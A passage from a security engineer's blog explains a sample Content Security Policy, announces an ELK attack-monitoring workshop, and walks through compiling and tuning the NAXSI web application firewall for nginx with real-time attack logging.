<span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">style-src</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> https://img1a.flixcart.com ‘unsafe-inline’ ‘unsafe-eval’; </span><span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">img-src</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> https://img1a.flixcart.com; </span></div>
<div dir="ltr" style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">connect-src</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> https://api.mybank.com; </span><span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">child-src</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: #444444; color: #65b042; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'self'; </span><span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">font-src </span><span style="background-color: #444444; color: #65b042; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'self' *</span></div>
<div dir="ltr" style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">report-uri</span><span style="background-color: #444444; color: #65b042; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> https://www.flipkart.com/appErrors</span></div>
</td></tr>
</tbody></table>
</div>
<div style="text-align: justify;">
<b style="font-weight: normal;"><br /></b></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">Here is the explanation of the above policy:</span></span></div>
<div style="text-align: justify;">
<b style="font-weight: normal;"><span style="font-family: "verdana" , sans-serif;"><br /></span></b></div>
<div style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: #444444; color: #89bdff; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">default-src -</span><span style="background-color: transparent; color: #333333; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> We default all origins as none, which forces us to specify all the source origins in all the ‘src’ directives.</span></span></div>
<div style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: #444444; color: #89bdff; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">script-src -</span><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: #333333; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">We mention all the script sources we want to consume our JS files from, also all the analytics files and if any inline nonces.</span></span></div>
<div style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: #444444; color: #89bdff; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">style-src -</span><span style="background-color: transparent; color: #333333; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> All the CSS files needs to go in this directive.</span></span></div>
<div style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: #444444; color: #89bdff; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">img-src -</span><span style="background-color: transparent; color: #333333; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> All the image cdn sources need to be mentioned in this directive.</span></span></div>
<div style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: #444444; color: #89bdff; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">connect-src-</span><span style="background-color: transparent; color: #333333; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> All the Ajax(xhr) requests connections needs to be specified in this directive.</span></span></div>
<div style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: #444444; color: #89bdff; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">report-uri-</span><span style="background-color: transparent; color: #333333; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> This directive is important for debugging any violations which occur on production. A json blob is sent to the mentioned endpoint with appropriate error information.</span></span></div>
<div style="text-align: justify;">
<b style="font-weight: normal;"><span style="font-family: "verdana" , sans-serif;"><br /></span></b></div>
<div style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: transparent; color: #333333; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">For more clarity on CSP directives we suggest to follow this </span><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><a href="http://content-security-policy.com/" style="color: #1155cc; text-decoration: none;">article</a><span style="color: #333333;">.</span></span></span><br />
<br />
<span style="color: #333333; font-family: "verdana" , sans-serif;"><span style="white-space: pre-wrap;">Firefox recently came up with a feature that allows us to test the secure implementation of CSP on any website. Just by opening the developer console and typing in "security csp" one can see the entire report.</span></span><br />
<span style="color: #333333; font-family: "verdana" , sans-serif;"><span style="white-space: pre-wrap;"><br /></span></span></div>
<div style="margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<div class="separator" style="clear: both; line-height: 1.56; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJlV3S8ioX8-g6-FIrkEgXg9soCnizS6AJW0x_8cI0t4QPjUEJN_mXwtBS_GUgrmjWsBRMkKpzNTPux_jWGIbPEk1UEdEOjB4VN4-A-JB49m0OpW5TjWUJyo4f7tD4ARSV7dMkb6CTrDY/s1600/Screen+Shot+2016-05-09+at+12.17.47+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="351" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJlV3S8ioX8-g6-FIrkEgXg9soCnizS6AJW0x_8cI0t4QPjUEJN_mXwtBS_GUgrmjWsBRMkKpzNTPux_jWGIbPEk1UEdEOjB4VN4-A-JB49m0OpW5TjWUJyo4f7tD4ARSV7dMkb6CTrDY/s320/Screen+Shot+2016-05-09+at+12.17.47+AM.png" width="449" /></a></div>
<div style="line-height: 1.56;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJlV3S8ioX8-g6-FIrkEgXg9soCnizS6AJW0x_8cI0t4QPjUEJN_mXwtBS_GUgrmjWsBRMkKpzNTPux_jWGIbPEk1UEdEOjB4VN4-A-JB49m0OpW5TjWUJyo4f7tD4ARSV7dMkb6CTrDY/s1600/Screen+Shot+2016-05-09+at+12.17.47+AM.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a><span style="color: #333333; font-family: "verdana" , sans-serif;"><span style="white-space: pre-wrap;"></span></span>
</div>
<div style="line-height: 1.56; text-align: justify;">
<br /></div>
<div style="line-height: 1.56; text-align: justify;">
<span style="color: #333333; font-family: "verdana" , sans-serif;"><span style="white-space: pre-wrap;"><span style="line-height: 1.56;">Some References</span></span></span></div>
<div style="line-height: 1.56; text-align: justify;">
<span style="color: #333333; font-family: "verdana" , sans-serif;"><span style="white-space: pre-wrap;"><span style="background-color: white; color: #1155cc; font-family: "courier new" , "courier" , monospace; font-size: x-small; line-height: 1.38; vertical-align: baseline;"><a href="https://benjaminhorn.io/code/content-security-policy-what-it-is-what-it-does-and-how-to-implement-it/">https://benjaminhorn.io/code/content-security-policy-what-it-is-what-it-does-and-how-to-implement-it/</a></span></span></span><br />
<span style="color: #333333; font-family: "verdana" , sans-serif;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small; white-space: pre-wrap;"><a href="https://securityheaders.io/" target="_blank">https://securityheaders.io</a></span></span></div>
<div style="line-height: 1.56;">
<span style="background-color: white; color: #1155cc; font-family: "courier new" , "courier" , monospace; font-size: x-small; line-height: 1.38; vertical-align: baseline; white-space: pre-wrap;"><a href="http://www.html5rocks.com/en/tutorials/security/content-security-policy/">http://www.html5rocks.com/en/tutorials/security/content-security-policy/</a></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<div style="text-align: justify;">
<span style="background-color: white; color: #1155cc; font-family: "courier new" , "courier" , monospace; font-size: x-small; font-style: normal; font-variant: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;"><a href="http://bens.me.uk/2012/content-security-policy">http://bens.me.uk/2012/content-security-policy</a></span><br />
<span style="background-color: white; color: #1155cc; font-family: "courier new" , "courier" , monospace; font-size: x-small; font-style: normal; font-variant: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;"><a href="http://www.cspplayground.com/csp_validator">http://www.cspplayground.com/csp_validator</a></span><br />
<span style="background-color: white; color: #1155cc; font-family: "courier new" , "courier" , monospace; font-size: x-small; font-style: normal; font-variant: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;"><a href="https://blog.sendsafely.com/using-content-security-policy-to-prevent-cross-site-scripting-xss">https://blog.sendsafely.com/using-content-security-policy-to-prevent-cross-site-scripting-xss</a></span><br /></div>
</div>
</div>
</div>Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.com0tag:blogger.com,1999:blog-1982130572676896150.post-53850943288966700322016-05-08T01:27:00.001-07:002016-05-08T11:36:46.627-07:00Attack Monitoring Using ELK #outofband #ELK #osquery #filebeat #ElasticSearch<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
<span style="font-family: "verdana" , sans-serif; text-align: left;">Me and Himanshu took a one day </span><span style="font-family: "verdana" , sans-serif; text-align: left;">Null Bachaav session</span><span style="font-family: "verdana" , sans-serif; text-align: left;"> yesterday on Attack monitoring. </span></div>
<div style="text-align: justify;">
<span style="font-family: "verdana" , sans-serif;">It was a good turnout with a mix of people with very little knowledge of SIEM to someone who has been full time working on SIEM products. </span><span style="font-family: "verdana" , sans-serif;">We covered most of topics that we normally deliver in a 2 day workshop at NullCon. Sharing the presentation below. </span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: center;">
<iframe allowfullscreen="" frameborder="0" height="485" marginheight="0" marginwidth="0" scrolling="no" src="//www.slideshare.net/slideshow/embed_code/key/1CEuOnCXmMe6LM" style="border-width: 0px; border: 0px solid #ccc; margin-bottom: 2px; max-width: 100%;" width="595"> </iframe> </div>
<div style="margin-bottom: 5px;">
<br /></div>
<span style="font-family: "verdana" , sans-serif;">Tweet me @prajalkulkarni if you need help with any specific topics.</span><br />
<br />
<span style="font-family: "verdana" , sans-serif;">Some references:</span><br />
<div style="background-color: white; color: #222222;">
<span style="font-family: "courier new" , "courier" , monospace;">CloudFares #outofband DDOS protection :</span><a data-saferedirecturl="https://www.google.com/url?hl=en&q=https://www.youtube.com/watch?v%3DXiK4643YdOk&source=gmail&ust=1462810701154000&usg=AFQjCNHhC7kRB33oihR9f2QgBTC0OlsBjg" href="https://www.youtube.com/watch?v=XiK4643YdOk" style="color: #1155cc; font-family: 'courier new', courier, monospace;" target="_blank">https://www.youtube.com/<wbr></wbr>watch?v=XiK4643YdOk</a></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: "courier new" , "courier" , monospace;">Integrate Bro IDS with ELK : <a href="https://www.elastic.co/blog/bro-ids-elastic-stack">https://www.elastic.co/blog/bro-ids-elastic-stack</a></span></div>
<div style="background-color: white;">
<div style="color: #222222;">
<span style="font-family: "courier new" , "courier" , monospace;"><span style="font-family: "verdana" , sans-serif;"><span style="font-family: "courier new" , "courier" , monospace;">Osquery in action:</span><span style="font-family: "courier new" , "courier" , monospace;"> </span></span><a data-saferedirecturl="https://www.google.com/url?hl=en&q=https://medium.com/airbnb-engineering/introducing-syslog-to-aws-kinesis-via-osquery-da4fc19de5ce%23.55om4ud0g&source=gmail&ust=1462810701154000&usg=AFQjCNFUM7F2iELwb9reoQdUwNsQ28-46A" href="https://medium.com/airbnb-engineering/introducing-syslog-to-aws-kinesis-via-osquery-da4fc19de5ce#.55om4ud0g" style="color: #1155cc; font-family: 'courier new', courier, monospace;" target="_blank">https://medium.com/<wbr></wbr>airbnb-engineering/<wbr></wbr>introducing-syslog-to-aws-<wbr></wbr>kinesis-via-osquery-<wbr></wbr>da4fc19de5ce#.55om4ud0g</a></span></div>
<span style="color: #222222; font-family: Courier New, Courier, monospace;"><a href="https://www.usenix.org/conference/usenixsecurity15/technical-sessions/presentation/fayaz">https://www.usenix.org/conference/usenixsecurity15/technical-sessions/presentation/fayaz</a></span></div>
</div>
Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.com0tag:blogger.com,1999:blog-1982130572676896150.post-8618343246088470442016-04-16T01:43:00.001-07:002016-05-08T09:04:32.333-07:00A cheap and effective Web App Firewall with continuous real time attack monitoring. #nginx #mod_security #naxsi #ElasticSearch #Kibana<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">I wanted to share one of my projects I worked on last year. We were trying to solve for “how to alert real time Web attacks” on our infrastructure. After a lot of brainstorming sessions we discarded the idea of having enterprise WAF solutions which are sold by many big players in the market. Most of the enterprise solutions work “inline” with your internet traffic and that chokes up considerable amount of your bandwidth.Having said that, I do not discourage anyone exploring these solutions. </span></span><br />
<span style="font-family: "verdana" , sans-serif; line-height: 1.38; white-space: pre-wrap;"><br /></span>
<span style="font-family: "verdana" , sans-serif; line-height: 1.38; white-space: pre-wrap;">So we started exploring multiple open source products which are under active development. We chose NAXSI and Mod Security as our prime targets and started our research in how we can extract the best out these two.</span><br />
<span style="color: black; font-family: "verdana" , sans-serif; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="color: black; font-family: "verdana" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">Since we were experimenting these on Nginx web server, we had to evaluate the one which gives us desirable output in terms of minimal performance impact and almost no false positives. We evaluated ModSecurity first and found it to be quite unstable, we observed multiple nginx worker processes dying on a regular intervals. However, these problems might have been solved with current commits to the project [</span><a href="https://github.com/SpiderLabs/ModSecurity/issues" style="line-height: 1.38; text-decoration: none;"><span style="color: #1155cc; font-family: "courier new"; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://github.com/SpiderLabs/ModSecurity/issues</span></a><span style="font-family: "verdana" , sans-serif; line-height: 1.38; white-space: pre-wrap;">].</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">I found NAXSI to be more stable in terms of performance, but it requires a lot of tuning to cut down false/positives.</span></span><br />
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;"><br /></span></span>
<div dir="ltr" style="line-height: 0.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;"><span style="font-size: 14px;"><b>Stats</b><span style="font-size: 14px;">:</span></span></span></span><span style="font-family: "courier new"; line-height: 1.38; white-space: pre-wrap;">[This may vary depending upon what all modules nginx has been compiled]</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;"><b>Nginx -</b> </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;">65K qps</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;">Max CPU Usage: 55%</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;"><b>Nginx+Naxsi</b> </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;">65K qps</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;">Max CPU Usage: 68%</span></span><br />
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;"><br /></span></span></div>
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">So, here on, I will be talking about how one can compile NAXSI with Nginx 1.4.4+ and fine tune it and have a continuous alert monitoring around the same.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<h3 style="text-align: left;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace; font-size: small;">What is NAXSI?:</span></span></h3>
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #333333; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">NAXSI means Nginx Anti Xss & Sql Injection.Its a web application firewall (WAF) which comes as a nginx module which needs to be compiled from source, it is also available as a package for many UNIX-like platforms. This module, by default, reads a small subset of simple rules (naxsi_core.rules) containing 99% of known patterns involved in websites vulnerabilities. For example, '<', '|' or 'drop' are not supposed to be part of a URI.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">Naxsi is different from other WAF solutions, since it totally relies on a whitelist approach and not a signature based approached which is a lot more slower and resource consuming.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
</div>
<span style="font-family: "verdana" , sans-serif; line-height: 1.38; white-space: pre-wrap;">So with Naxsi in place we were able to have decent picture of which all IP addresses were attacking us and how we can stop them at our edge network.</span><br />
<b style="font-weight: normal;"><span style="font-family: "verdana" , sans-serif;"><br /></span></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">To start with let's look at a simple architecture of our Web application Firewall.</span></span></div>
<b style="font-weight: normal;"><span style="font-family: "verdana" , sans-serif;"><br /></span></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "verdana" , sans-serif; margin-left: 1em; margin-right: 1em;"><img alt="Screen Shot 2016-04-15 at 8.28.18 PM.png" height="436" src="https://lh4.googleusercontent.com/qN69oFRRC2D8m6MDD7aCD3ESLCwM2XDITkReenbMPNyjSsbacCPJcxKQQuPgW9duBA4TG90g3V1I3QqzWzYQJzWA3TxEtz4QEXf1XART6G6ilfuccSWd-YrjR6s1cYa4PN9JYYjp" style="border: none; transform: rotate(0rad);" width="640" /></span></div>
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<b style="font-weight: normal;"><span style="font-family: "verdana" , sans-serif;"><br /></span></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;"><b>Here are simple steps to compile NAXSI from source :</b></span></span></div>
<ol style="text-align: left;">
<li style="font-family: 'courier new', courier, monospace; line-height: 1.38; white-space: pre-wrap;"><span style="line-height: 1.38;">Select the nginx tar file here(http://nginx.org/download/)</span></li>
<li style="font-family: 'courier new', courier, monospace; line-height: 1.38; white-space: pre-wrap;"><span style="line-height: 1.38;">Untar it in the /opt folder</span></li>
<li style="font-family: 'courier new', courier, monospace; line-height: 1.38; white-space: pre-wrap;"><span style="line-height: 1.38;">wget the newest naxsi source code (https://github.com/nbs-system/naxsi) in /opt folder</span></li>
<li style="font-family: 'courier new', courier, monospace; line-height: 1.38; white-space: pre-wrap;"><span style="line-height: 1.38;">install libpcre3-dev </span></li>
<li style="font-family: 'courier new', courier, monospace; line-height: 1.38; white-space: pre-wrap;"><span style="line-height: 1.38;">cd nginx-1.4.4 and start compiling</span></li>
<li style="font-family: 'courier new', courier, monospace; line-height: 1.38; white-space: pre-wrap;"><span style="line-height: 1.38;">sudo ./configure --pid-path=/var/run/nginx.pid --lock-path=/var/lock/nginx.lock --with-http_ssl_module --with-debug --http-log-path=/var/log/nginx/access.log --conf-path=/etc/nginx/fk_nginx.conf --with-http_stub_status_module --user=nginx --error-log-path=/var/log/nginx/error.log --prefix=/usr/local/nginx_new --sbin-path=/usr/sbin/nginx --with-http_realip_module --http-client-body-temp-path=/var/lib/nginx/body --http-proxy-temp-path=/var/lib/nginx/proxy --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --add-module=../naxsi/naxsi_src/ </span></li>
<li style="font-family: 'courier new', courier, monospace; line-height: 1.38; white-space: pre-wrap;"><span style="line-height: 1.38;">sudo make && sudo make install </span></li>
<li style="font-family: 'courier new', courier, monospace; line-height: 1.38; white-space: pre-wrap;"><span style="line-height: 1.38;">Now copy the naxsi main ruleset file to /etc/nginx → sudo cp naxsi_core.rules /etc/nginx/naxsi_core.rules</span></li>
<li style="font-family: 'courier new', courier, monospace; line-height: 1.38; white-space: pre-wrap;"><span style="line-height: 1.38;">sudo nano /etc/nginx/nginx.conf</span></li>
<li style="font-family: 'courier new', courier, monospace; line-height: 1.38; white-space: pre-wrap;"><span style="line-height: 1.38;">Add /etc/nginx/naxsi_core.rules to the http block of /etc/nginx/nginx.conf with an include directive:</span><br />
<span style="line-height: 1.38;">http {</span><br />
<span style="line-height: 1.38;">    include /etc/nginx/naxsi_core.rules;</span><br />
<span style="line-height: 1.38;">}</span></li>
<li style="font-family: 'courier new', courier, monospace; line-height: 1.38; white-space: pre-wrap;"><span style="line-height: 1.38;">Create the whitelist file my_naxsi.rules</span></li>
</ol>
<span style="line-height: 1.38; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;"><b>A few links on whitelist creation:</b></span></span><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://github.com/prajal/nxutil" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "courier new"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://github.com/prajal/nxutil</span></a></div>
<span id="docs-internal-guid-c144d0cf-1e4b-1251-6392-b4956f85f9b3"><a href="https://github.com/nbs-system/naxsi/wiki/whitelists" style="text-decoration: none;"><span style="color: #1155cc; font-family: "courier new"; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://github.com/nbs-system/naxsi/wiki/whitelists</span></a></span><br />
<span style="color: black; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;"><b>For a simple apt-get installation, follow:</b> </span></span><a href="https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-naxsi-on-ubuntu-14-04" style="font-family: 'courier new', courier, monospace; text-decoration: none; white-space: pre-wrap;">https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-naxsi-on-ubuntu-14-04</a><br />
<span style="font-family: "verdana" , sans-serif; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;"><br /></span>
<span style="font-family: "verdana" , sans-serif; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;">We used NAXSI in learning mode to avoid as much noise as possible. For creating the ruleset I recommend running it in production in learning mode, gathering a significant amount of valid traffic, and then running the </span><span style="line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;">nxutil</span></span><span style="font-family: "verdana" , sans-serif; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;"> script to generate a whitelist that is specific to your prod environment.</span><br />
<span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;">More details on </span><span style="color: black; font-family: "courier new" , "courier" , monospace; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;">nxutil</span><span style="color: black; font-family: "verdana" , sans-serif; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"> can be found here: </span><a href="https://github.com/prajal/nxutil" style="text-decoration: none;"><span style="color: #1155cc; font-family: "courier new"; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://github.com/prajal/nxutil</span></a><br />
<span style="font-family: "verdana" , sans-serif; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;"> </span><br />
<span style="font-family: "verdana" , sans-serif; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;">NAXSI writes all its attack logs to the nginx error log:</span><br />
<span style="color: black; text-indent: 36pt; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;"> /var/log/nginx/error.log</span></span><br />
<span style="font-family: "verdana" , sans-serif; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;"><br /></span>
